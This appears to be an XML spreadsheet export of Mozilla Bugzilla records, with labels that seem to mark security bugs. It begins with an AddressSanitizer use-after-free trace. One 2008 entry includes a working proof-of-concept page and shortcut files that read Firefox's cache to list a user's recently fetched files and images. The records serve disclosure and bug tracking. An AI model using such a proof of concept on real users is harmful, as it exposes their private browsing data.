    #10 0x7f79484f0187 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/glue/MessageChannel.cpp:1661:14
    #11 0x7f79484ecfc6 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/glue/MessageChannel.cpp:1599:17
    #12 0x7f79484dad97 in mozilla::ipc::MessageChannel::OnMaybeDequeueOne() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/glue/MessageChannel.cpp:1566:5
    #13 0x7f794850a6b2 in applyImpl&lt;mozilla::ipc::MessageChannel, bool (mozilla::ipc::MessageChannel::*)()&gt; /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/nsThreadUtils.h:729:12
    #14 0x7f794850a6b2 in apply&lt;mozilla::ipc::MessageChannel, bool (mozilla::ipc::MessageChannel::*)()&gt; /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/nsThreadUtils.h:735
    #15 0x7f794850a6b2 in mozilla::detail::RunnableMethodImpl&lt;bool (mozilla::ipc::MessageChannel::*)(), false, true&gt;::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/nsThreadUtils.h:764
    #16 0x7f7948509c9f in Run /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/mozilla/ipc/MessageChannel.h:550:22
    #17 0x7f7948509c9f in mozilla::ipc::MessageChannel::DequeueTask::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/mozilla/ipc/MessageChannel.h:569
    #18 0x7f79477256b6 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:1068:7
    #19 0x7f79477a3a9c in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/glue/nsThreadUtils.cpp:290:10
    #20 0x7f79484f74ef in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/glue/MessagePump.cpp:100:21
    #21 0x7f794846c1f8 in RunInternal /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #22 0x7f794846c1f8 in RunHandler /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:225
    #23 0x7f794846c1f8 in MessageLoop::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:205
    #24 0x7f794df7d49f in nsBaseAppShell::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/widget/nsBaseAppShell.cpp:156:3
    #25 0x7f7950025587 in XRE_RunAppShell /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:851:12
    #26 0x7f794846c1f8 in RunInternal /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #27 0x7f794846c1f8 in RunHandler /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:225
    #28 0x7f794846c1f8 in MessageLoop::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:205
    #29 0x7f7950024c23 in XRE_InitChildProcess /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:681:7
    #30 0x4dfb2b in content_process_main /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:224:19
    #31 0x4dfb2b in main /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/browser/app/nsBrowserApp.cpp:357
    #32 0x7f7962b8282f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
    #33 0x41ba08 in _start (/home/nils/fuzzer3/firefox/firefox+0x41ba08)
0x60e000098598 is located 120 bytes inside of 160-byte region [0x60e000098520,0x60e0000985c0)
freed by thread T0 (Web Content) here:
    #0 0x4b215b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
    #1 0x7f79476034c4 in SnowWhiteKiller::~SnowWhiteKiller() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/base/nsCycleCollector.cpp:2685:9
    #2 0x7f79476030b6 in nsCycleCollector::FreeSnowWhite(bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/base/nsCycleCollector.cpp:2859:3
    #3 0x7f79490e637e in AsyncFreeSnowWhite::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/xpconnect/src/XPCJSRuntime.cpp:142:34
    #4 0x7f79477256b6 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:1068:7
    #5 0x7f79477a3a9c in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/glue/nsThreadUtils.cpp:290:10
    #6 0x7f79484f74ef in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/glue/MessagePump.cpp:100:21
    #7 0x7f794846c1f8 in RunInternal /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #8 0x7f794846c1f8 in RunHandler /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:225
    #9 0x7f794846c1f8 in MessageLoop::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:205
    #10 0x7f794df7d49f in nsBaseAppShell::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/widget/nsBaseAppShell.cpp:156:3
    #11 0x7f7950025587 in XRE_RunAppShell /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:851:12
    #12 0x7f794846c1f8 in RunInternal /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #13 0x7f794846c1f8 in RunHandler /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:225
    #14 0x7f794846c1f8 in MessageLoop::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:205
    #15 0x7f7950024c23 in XRE_InitChildProcess /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:681:7
    #16 0x4dfb2b in content_process_main /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:224:19
    #17 0x4dfb2b in main /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/browser/app/nsBrowserApp.cpp:357
    #18 0x7f7962b8282f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
previously allocated by thread T0 (Web Content) here:
    #0 0x4b247b in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x4e0bcd in moz_xmalloc /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7f794a431c94 in operator new /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:193:12
    #3 0x7f794a431c94 in nsDocument::Timeline() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsDocument.cpp:3166
    #4 0x7f794e8c9c69 in PresShell::Init(nsIDocument*, nsPresContext*, nsViewManager*, mozilla::StyleSetHandle) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsPresShell.cpp:969:3
    #5 0x7f794a438e1e in nsDocument::doCreateShell(nsPresContext*, nsViewManager*, mozilla::StyleSetHandle) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsDocument.cpp:3773:3
    #6 0x7f794caac247 in nsHTMLDocument::CreateShell(nsPresContext*, nsViewManager*, mozilla::StyleSetHandle) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/html/nsHTMLDocument.cpp:274:10
    #7 0x7f794e839bbb in nsDocumentViewer::InitPresentationStuff(bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsDocumentViewer.cpp:633:16
    #8 0x7f794e8394cf in nsDocumentViewer::InitInternal(nsIWidget*, nsISupports*, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, bool, bool, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsDocumentViewer.cpp:887:10
    #9 0x7f794e838667 in nsDocumentViewer::Init(nsIWidget*, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsDocumentViewer.cpp:617:10
    #10 0x7f794f5a5409 in nsDocShell::SetupNewViewer(nsIContentViewer*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/docshell/base/nsDocShell.cpp:9366:7
    #11 0x7f794f5a3b99 in nsDocShell::Embed(nsIContentViewer*, char const*, nsISupports*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/docshell/base/nsDocShell.cpp:7227:17
    #12 0x7f794f53a1a4 in nsDocShell::CreateContentViewer(nsACString_internal const&amp;, nsIRequest*, nsIStreamListener**) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/docshell/base/nsDocShell.cpp:9174:3
    #13 0x7f794f5375df in nsDSURIContentListener::DoContent(nsACString_internal const&amp;, bool, nsIRequest*, nsIStreamListener**, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/docshell/base/nsDSURIContentListener.cpp:128:10
    #14 0x7f79495509bb in nsDocumentOpenInfo::TryContentListener(nsIURIContentListener*, nsIChannel*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/uriloader/base/nsURILoader.cpp:720:17
    #15 0x7f794954d1ff in nsDocumentOpenInfo::DispatchContent(nsIRequest*, nsISupports*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/uriloader/base/nsURILoader.cpp:398:30
    #16 0x7f794954c30b in nsDocumentOpenInfo::OnStartRequest(nsIRequest*, nsISupports*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/uriloader/base/nsURILoader.cpp:259:8
    #17 0x7f79478a7a2b in nsBaseChannel::OnStartRequest(nsIRequest*, nsISupports*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/netwerk/base/nsBaseChannel.cpp:809:14
    #18 0x7f79478f0bde in nsInputStreamPump::OnStateStart() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/netwerk/base/nsInputStreamPump.cpp:524:14
    #19 0x7f79478f00b8 in nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/netwerk/base/nsInputStreamPump.cpp:426:25
    #20 0x7f79476e04e0 in nsInputStreamReadyEvent::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/io/nsStreamUtils.cpp:95:9
    #21 0x7f79477256b6 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:1068:7
    #22 0x7f79477a3a9c in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/glue/nsThreadUtils.cpp:290:10
    #23 0x7f79484f74ef in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/glue/MessagePump.cpp:100:21
    #24 0x7f794846c1f8 in RunInternal /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #25 0x7f794846c1f8 in RunHandler /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:225
    #26 0x7f794846c1f8 in MessageLoop::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:205
    #27 0x7f794df7d49f in nsBaseAppShell::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/widget/nsBaseAppShell.cpp:156:3
    #28 0x7f7950025587 in XRE_RunAppShell /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:851:12
    #29 0x7f794846c1f8 in RunInternal /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #30 0x7f794846c1f8 in RunHandler /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:225
    #31 0x7f794846c1f8 in MessageLoop::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:205
    #32 0x7f7950024c23 in XRE_InitChildProcess /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:681:7
    #33 0x4dfb2b in content_process_main /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:224:19
    #34 0x4dfb2b in main /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/browser/app/nsBrowserApp.cpp:357
    #35 0x7f7962b8282f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
SUMMARY: AddressSanitizer: heap-use-after-free /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:37:5 in AddRef
Shadow bytes around the buggy address:
  0x0c1c8000b060: 00 00 00 02 fa fa fa fa fa fa fa fa 00 00 00 00
  0x0c1c8000b070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02
  0x0c1c8000b080: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c1c8000b090: 00 00 00 00 00 00 00 00 00 00 00 02 fa fa fa fa
  0x0c1c8000b0a0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
=&gt;0x0c1c8000b0b0: fd fd fd[fd]fd fd fd fd fa fa fa fa fa fa fa fa
  0x0c1c8000b0c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1c8000b0d0: 00 00 00 02 fa fa fa fa fa fa fa fa 00 00 00 00
  0x0c1c8000b0e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02
  0x0c1c8000b0f0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c1c8000b100: 00 00 00 00 00 00 00 00 00 00 00 02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141==ABORTING</t>
        </is>
      </c>
      <c r="X4926" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4927">
      <c r="A4927" t="n">
        <v>1760944</v>
      </c>
      <c r="B4927" t="inlineStr">
        <is>
          <t>2022-03-23 00:02:06 -0700</t>
        </is>
      </c>
      <c r="C4927" t="inlineStr">
        <is>
          <t>Disabling shift optimization asserts in js::jit::AssertValidObjectPtr</t>
        </is>
      </c>
      <c r="D4927" t="inlineStr">
        <is>
          <t>2023-01-16 20:28:29 -0800</t>
        </is>
      </c>
      <c r="E4927" t="n">
        <v>1</v>
      </c>
      <c r="F4927" t="n">
        <v>1</v>
      </c>
      <c r="G4927" t="n">
        <v>3</v>
      </c>
      <c r="H4927" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4927" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4927" t="inlineStr">
        <is>
          <t>JavaScript: GC</t>
        </is>
      </c>
      <c r="K4927" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4927" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4927" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4927" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4927" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4927" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main101+]</t>
        </is>
      </c>
      <c r="Q4927" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4927" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S4927" t="inlineStr">
        <is>
          <t>101 Branch</t>
        </is>
      </c>
      <c r="T4927" t="n">
        <v>1</v>
      </c>
      <c r="U4927" t="n">
        <v>0</v>
      </c>
      <c r="V4927" t="n">
        <v>15</v>
      </c>
      <c r="W4927" t="inlineStr">
        <is>
          <t>Steps to reproduce:
In a non-vanilla version of spidermonkey, I discovered an assertion violation. This bug is filed as the modification to spidermonkey is probably not the root-cause but instead exposes an underlying issue affecting the vanilla engine as well.
When disabling the array shift optimizations in `NativeObject::{tryShiftDenseElements,tryUnshiftDenseElements}` by letting these two function immediately return false, one of the jit-tests (js/src/jit-test/tests/basic/shifted-elements6.js) crashes in `js::jit::AssertValidObjectPtr`.
The crash happens in a small percentage of executions only, hence reproducing the issue might require some repetition.
As @iain pointed out: reproducing the issue in rr is possible if the rr flag --chaos is used.</t>
        </is>
      </c>
      <c r="X4927" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4928">
      <c r="A4928" t="n">
        <v>871161</v>
      </c>
      <c r="B4928" t="inlineStr">
        <is>
          <t>2013-05-11 08:05:10 -0700</t>
        </is>
      </c>
      <c r="C4928" t="inlineStr">
        <is>
          <t>Potential XSS with cross-domain (cross-origin) inheritance of charset</t>
        </is>
      </c>
      <c r="D4928" t="inlineStr">
        <is>
          <t>2024-05-30 08:02:54 -0700</t>
        </is>
      </c>
      <c r="E4928" t="n">
        <v>1</v>
      </c>
      <c r="F4928" t="n">
        <v>1</v>
      </c>
      <c r="G4928" t="n">
        <v>3</v>
      </c>
      <c r="H4928" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4928" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4928" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K4928" t="inlineStr">
        <is>
          <t>20 Branch</t>
        </is>
      </c>
      <c r="L4928" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4928" t="inlineStr">
        <is>
          <t>Windows Vista</t>
        </is>
      </c>
      <c r="N4928" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4928" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4928" t="inlineStr">
        <is>
          <t>[adv-main26+]</t>
        </is>
      </c>
      <c r="Q4928" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4928" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4928" t="inlineStr">
        <is>
          <t>mozilla27</t>
        </is>
      </c>
      <c r="T4928" t="n">
        <v>1</v>
      </c>
      <c r="U4928" t="n">
        <v>0</v>
      </c>
      <c r="V4928" t="n">
        <v>57</v>
      </c>
      <c r="W4928" t="inlineStr">
        <is>
          <t>Created attachment 748437
fx_x-domain_inheritance_testcase.html
User Agent: Mozilla/5.0 (Windows NT 6.0; rv:20.0) Gecko/20100101 Firefox/20.0
Build ID: 20130409194949
Steps to reproduce:
Using POST request, if the target page doesn't have charset information, Firefox inherits character encodings across domain.
This is bad because it increases the potential of XSS.
Please check the following page and confirm this behavior:
http://l0.cm/fx_x-domain_inheritance.html
Expected results:
Firefox should not inherit the charset across domain.</t>
        </is>
      </c>
      <c r="X4928" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4929">
      <c r="A4929" t="n">
        <v>455311</v>
      </c>
      <c r="B4929" t="inlineStr">
        <is>
          <t>2008-09-15 06:10:37 -0700</t>
        </is>
      </c>
      <c r="C4929" t="inlineStr">
        <is>
          <t>[FIX]mid-autumn festival vulnerability</t>
        </is>
      </c>
      <c r="D4929" t="inlineStr">
        <is>
          <t>2013-08-27 10:26:34 -0700</t>
        </is>
      </c>
      <c r="E4929" t="n">
        <v>1</v>
      </c>
      <c r="F4929" t="n">
        <v>1</v>
      </c>
      <c r="G4929" t="n">
        <v>3</v>
      </c>
      <c r="H4929" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4929" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4929" t="inlineStr">
        <is>
          <t>Networking: File</t>
        </is>
      </c>
      <c r="K4929" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4929" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4929" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N4929" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4929" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4929" t="inlineStr">
        <is>
          <t>[sg:moderate]</t>
        </is>
      </c>
      <c r="Q4929" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4929" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4929" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4929" t="n">
        <v>1</v>
      </c>
      <c r="U4929" t="n">
        <v>0</v>
      </c>
      <c r="V4929" t="n">
        <v>89</v>
      </c>
      <c r="W4929" t="inlineStr">
        <is>
          <t>Lui Dieyu in email reports:
For Firefox, location is wrong when dot URL shortcut is launched by HTML elements. Slightly variant from CVE-2008-2810 which is about command line and only fixed in that perspective. Contents at any location can be read by taking advantage of this error - cache information, cookie information, web, local file system, etc.
Here is proof of concept showing all cached images. Web page is required to be opened in local path or Windows share(UNC/SMB) path. Reproduced on Firefox 3.0.1 running on Windows XP SP3, US English.
-----testurl1.url-----
[InternetShortcut]
URL=about:cache?device=memory
IDList=
[{000214A0-0000-0000-C000-000000000046}]
Prop3=19,2
-----testurl2.url-----
[InternetShortcut]
URL=about:cache?device=disk
IDList=
[{000214A0-0000-0000-C000-000000000046}]
Prop3=19,2
-----test.html-----
&lt;script&gt;
function a()
{
s="";
h="";
for(i=0;i&lt;window.frames.length;i++)
{
    d=window.frames[i].document;
    for(j=0;j&lt;d.links.length;j++)
    {
        u=d.links[j].text
        s+=u+"\n";
        h+="&lt;img src=\""+u+"\"&gt;";
    }
}
document.getElementById("t").value=s;
document.getElementById("x").innerHTML=h;
}
&lt;/script&gt;
&lt;a href="javascript:a();"&gt;Start Test&lt;/a&gt;&lt;br&gt;
&lt;a href="javascript:window.location=location.href"&gt;Load This Page Again&lt;/a&gt;&lt;br&gt;
&lt;br&gt;
&lt;br&gt;
&lt;b&gt;List of files that you recently fetched from the internet:&lt;/b&gt;&lt;br&gt;
&lt;textarea rows="10" cols="100" id=t wrap=off&gt;&lt;/textarea&gt;
&lt;br&gt;
&lt;br&gt;
&lt;b&gt;List of images that you recently viewed on the internet:&lt;/b&gt;&lt;br&gt;
&lt;div id=x&gt;&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;iframe width=300 height=200 src="testurl1.url"&gt;&lt;/iframe&gt;
&lt;iframe width=300 height=200 src="testurl2.url"&gt;&lt;/iframe&gt;</t>
        </is>
      </c>
      <c r="X4929" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4930">
      <c r="A4930" t="n">
        <v>858806</v>
      </c>
      <c r="B4930" t="inlineStr">
        <is>
          <t>2013-04-05 14:58:47 -0700</t>
        </is>
      </c>
      <c r="C4930" t="inlineStr">
        <is>
          <t>Currency displayed should match the language/region selection</t>
        </is>
      </c>
      <c r="D4930" t="inlineStr">
        <is>
          <t>2013-04-22 07:36:01 -0700</t>
        </is>
      </c>
      <c r="E4930" t="n">
        <v>1</v>
      </c>
      <c r="F4930" t="n">
        <v>1</v>
      </c>
      <c r="G4930" t="n">
        <v>6</v>
      </c>
      <c r="H4930" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4930" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J4930" t="inlineStr">
        <is>
          <t>Payments/Refunds</t>
        </is>
      </c>
      <c r="K4930" t="inlineStr">
        <is>
          <t>1.2</t>
        </is>
      </c>
      <c r="L4930" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M4930" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N4930" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4930" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4930" t="inlineStr">
        <is>
          <t>p=1</t>
        </is>
      </c>
      <c r="Q4930" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4930" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4930" t="inlineStr">
        <is>
          <t>2013-04-18</t>
        </is>
      </c>
      <c r="T4930" t="n">
        <v>1</v>
      </c>
      <c r="U4930" t="n">
        <v>0</v>
      </c>
      <c r="V4930" t="n">
        <v>6</v>
      </c>
      <c r="W4930" t="inlineStr">
        <is>
          <t>steps to reproduce:
1. Set the language on your unagi phone to Polski
2. Launch marketplace-dev app 
3. Check the language/region selection under Settings. It should be set to Polski/Polska
4. Navigate to the details page for a paid app
expected behavior:
Price is shown in local currency i.e., zloty(zl)
observed behavior:
Price is always shown in USD irrespective of locale/region selection.</t>
        </is>
      </c>
      <c r="X4930" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4931">
      <c r="A4931" t="n">
        <v>1098466</v>
      </c>
      <c r="B4931" t="inlineStr">
        <is>
          <t>2014-11-13 10:25:05 -0800</t>
        </is>
      </c>
      <c r="C4931" t="inlineStr">
        <is>
          <t>API whitelist fetched from ES is never cached</t>
        </is>
      </c>
      <c r="D4931" t="inlineStr">
        <is>
          <t>2015-04-02 06:44:48 -0700</t>
        </is>
      </c>
      <c r="E4931" t="n">
        <v>1</v>
      </c>
      <c r="F4931" t="n">
        <v>1</v>
      </c>
      <c r="G4931" t="n">
        <v>4</v>
      </c>
      <c r="H4931" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4931" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J4931" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K4931" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4931" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4931" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4931" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4931" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4931" t="inlineStr"/>
      <c r="Q4931" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4931" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4931" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4931" t="n">
        <v>1</v>
      </c>
      <c r="U4931" t="n">
        <v>0</v>
      </c>
      <c r="V4931" t="n">
        <v>2</v>
      </c>
      <c r="W4931" t="inlineStr">
        <is>
          <t>When we fetch all supersearch fields from ES to supplement the API_WHITELIST on top of the baseline we're attempting to read from cache but we never, as far as I can see, write to that cache. 
https://github.com/mozilla/socorro/blob/f74ed15cf446d1a79c20abbecc2375b0d6d8992f/webapp-django/crashstats/crashstats/models.py#L54-L75
Grepping around I only see `api_supersearch_fields_` being used in two place. One to *read* from the cache and one to *delete* from the cache.</t>
        </is>
      </c>
      <c r="X4931" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4932">
      <c r="A4932" t="n">
        <v>1153688</v>
      </c>
      <c r="B4932" t="inlineStr">
        <is>
          <t>2015-04-12 18:03:22 -0700</t>
        </is>
      </c>
      <c r="C4932" t="inlineStr">
        <is>
          <t>Type confusion between object and symbol in XPCVariant</t>
        </is>
      </c>
      <c r="D4932" t="inlineStr">
        <is>
          <t>2016-07-02 10:39:22 -0700</t>
        </is>
      </c>
      <c r="E4932" t="n">
        <v>1</v>
      </c>
      <c r="F4932" t="n">
        <v>1</v>
      </c>
      <c r="G4932" t="n">
        <v>3</v>
      </c>
      <c r="H4932" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4932" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4932" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K4932" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4932" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4932" t="inlineStr">
        <is>
          <t>macOS</t>
